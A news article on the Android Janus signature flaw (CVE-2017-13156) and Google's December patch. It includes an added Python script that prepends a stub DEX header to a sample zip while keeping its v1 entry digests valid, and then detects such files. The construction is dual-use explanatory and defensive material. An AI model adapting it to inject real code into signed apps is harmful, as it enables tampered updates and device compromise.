Researchers have discovered a new vulnerability in Google's Android that lets attackers add malicious code to existing files thanks to a flaw in the digital signature checking process.
Security vendor GuardSquare found that Android does not properly distinguish between Android application package (APK) files and Dalvik executable (DEX) files: the v1 (JAR) signature scheme verifies only the archive's zip entries, while the runtime decides which format it is loading from the first bytes of the file, so a single file can satisfy both parsers.
"The root of the problem is that a file can be a valid APK file and a valid DEX file at the same time," the firm said. Guard Square named the vulnerability Janus, after the two-faced Roman god, as a nod to the duality issue.
Android 5.0 and later are affected when an app is signed with the v1 scheme only. A v1 signature covers the contents of the zip entries and nothing else, so bytes placed in front of the archive are never hashed, and the Android runtime, which checks the leading bytes of a file to decide whether it is a DEX or an APK, will treat a file that starts with the DEX magic as a DEX.
Attackers could therefore prepend a malicious DEX file to a legitimately signed APK without invalidating the APK's signature.
The installer accepts the file as a genuine update because the v1 signature still verifies, but the runtime executes the prepended malicious DEX in place of the app's real code.
GuardSquare said the flaw could be used to push a tampered update for a trusted application, either a third-party app or a system app running with elevated privileges, with the original developer's signature still validating, which could lead to full device compromise.
Developers should sign their apps with the newer APK signature scheme v2, which appeared in Android 7.0 and covers every byte of the package file, unlike its v1 predecessor. The protection only applies on devices running 7.0 or later: apps must still carry a v1 signature for older devices, and a 5.x or 6.x handset verifies nothing but that v1 signature, so it remains exposed until it receives the platform patch. Signing tools add an X-Android-APK-Signed attribute to the v1 signature file so that a 7.0+ device rejects a package whose v2 signing block has been stripped.
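The following script is an added example, not GuardSquare's proof of concept or Google's verifier, illustrating both the construction described above and the two checks a practitioner would want: it builds a tiny zip as a stand-in for a v1-signed APK, prepends a constructed DEX header stub (correct magic, zeroed fields, not loadable code) while fixing up the zip's absolute offsets, shows that the per-entry digests a v1 signature covers are unchanged, and then flags such a dual-format file and reports whether an APK Signing Block (the v2 scheme) is present. All names and the sample entries are assumptions made for the example.

```python
"""Janus-style APK/DEX dual-format construction and detection (added example)."""
import hashlib
import io
import struct
import zipfile

DEX_MAGIC = b"dex\n035\x00"               # DEX magic for format version 035
EOCD_SIG = b"PK\x05\x06"                   # zip end-of-central-directory record
CDH_SIG = b"PK\x01\x02"                    # zip central directory file header
APK_SIG_BLOCK_MAGIC = b"APK Sig Block 42"  # trailer magic of the v2 APK Signing Block


def build_sample_apk() -> bytes:
    """Constructed stand-in for a v1-signed APK: a zip with the usual entry names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"<manifest/>")
        z.writestr("classes.dex", b"genuine app code placeholder")
        z.writestr("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\n")
    return buf.getvalue()


def prepend_dex(apk: bytes, dex: bytes) -> bytes:
    """Put a DEX in front of a zip and fix up the zip's absolute offsets.

    Zip readers find the central directory from the EOCD record at the end of the
    file, and the offsets stored there are absolute, so each one is shifted by
    len(dex). Entry contents, the only thing a v1 signature hashes, are untouched.
    """
    eocd_off = apk.rfind(EOCD_SIG)  # assumes no zip comment containing the signature
    if eocd_off < 0:
        raise ValueError("not a zip: no EOCD record")
    cd_size, cd_off = struct.unpack_from("<II", apk, eocd_off + 12)
    out = bytearray(dex + apk)
    shift = len(dex)
    pos, end = shift + cd_off, shift + cd_off + cd_size
    while pos < end:
        if out[pos:pos + 4] != CDH_SIG:
            raise ValueError("corrupt central directory")
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", out, pos + 28)
        (local_off,) = struct.unpack_from("<I", out, pos + 42)
        struct.pack_into("<I", out, pos + 42, local_off + shift)  # local header offset
        pos += 46 + name_len + extra_len + comment_len
    struct.pack_into("<I", out, shift + eocd_off + 16, cd_off + shift)  # CD offset
    return bytes(out)


def entry_digests(data: bytes) -> dict:
    """SHA-256 of every zip entry's content: the material a v1 (JAR) signature covers."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return {name: hashlib.sha256(z.read(name)).hexdigest() for name in z.namelist()}


def looks_like_janus(data: bytes) -> bool:
    """Flag a file that is a DEX by its first bytes and a zip by its last bytes."""
    return data.startswith(b"dex\n") and data.rfind(EOCD_SIG) > 0


def has_v2_signing_block(data: bytes) -> bool:
    """True if an APK Signing Block sits immediately before the central directory."""
    eocd_off = data.rfind(EOCD_SIG)
    if eocd_off < 0:
        return False
    (cd_off,) = struct.unpack_from("<I", data, eocd_off + 16)
    return cd_off >= 16 and data[cd_off - 16:cd_off] == APK_SIG_BLOCK_MAGIC


def demo() -> dict:
    """Build the sample APK, prepend a DEX header stub, and run the checks."""
    apk = build_sample_apk()
    dex_stub = DEX_MAGIC + b"\x00" * (0x70 - 8)  # constructed header-sized stub, not real DEX
    janus = prepend_dex(apk, dex_stub)
    return {
        "same_entry_digests": entry_digests(apk) == entry_digests(janus),
        "original_flagged": looks_like_janus(apk),
        "janus_flagged": looks_like_janus(janus),
        "janus_has_v2_block": has_v2_signing_block(janus),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Because the entry digests of the original and the dual-format file are identical, any verifier that only hashes zip entries, as the v1 scheme does, passes both; the v2 scheme hashes the whole file, so the same prefix would break a v2 signature. The `looks_like_janus` check is a cheap triage filter for an APK corpus, and `has_v2_signing_block` answers whether a given package was signed with the newer scheme at all.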
GuardSquare said the flaw had not been exploited in the wild. Google patched it, tracked as CVE-2017-13156, in its December security bulletin.
The bulletin contains patches for five critical remote code execution flaws in the Android media framework, which has been a source of multiple serious vulnerabilities in the mobile operating system.
Google also issued patches for a critical bug - CVE-2017-14907 - that weakened storage encryption on its Pixel and Nexus handsets.